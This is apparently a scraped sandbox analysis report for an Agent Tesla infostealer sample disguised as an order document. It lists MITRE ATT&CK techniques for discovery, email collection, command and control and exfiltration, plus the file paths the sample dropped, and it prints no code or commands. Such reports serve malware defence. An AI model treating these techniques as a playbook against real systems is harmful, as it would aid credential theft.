Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Objedn#U00e1vka_20248481119000903.img

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ul02a4h.ym1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d1fwnyw.mys.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lgqcbgh.glu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksi34dec.5l4.ps1

C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll

C:\Users\user\Desktop\tmp.log

C:\Users\user\slouchingly\bigbloom\forkvakl\Dekomponeres.Pig

C:\Users\user\slouchingly\bigbloom\forkvakl\Gucki197.rev

C:\Users\user\slouchingly\bigbloom\forkvakl\Nskebarn23.bes

C:\Users\user\slouchingly\bigbloom\forkvakl\kargoerne.mas

C:\Users\user\slouchingly\bigbloom\forkvakl\paralysernes.dis

C:\Users\user\slouchingly\bigbloom\forkvakl\skadegreren.txt

C:\Users\user\slouchingly\bigbloom\forkvakl\sprtter.com

\Device\CdRom1\Objedn vka_20248481119000903.exe

Static File Info

General

Windows Analysis Report
Objedn#U00e1vka_20248481119000903.img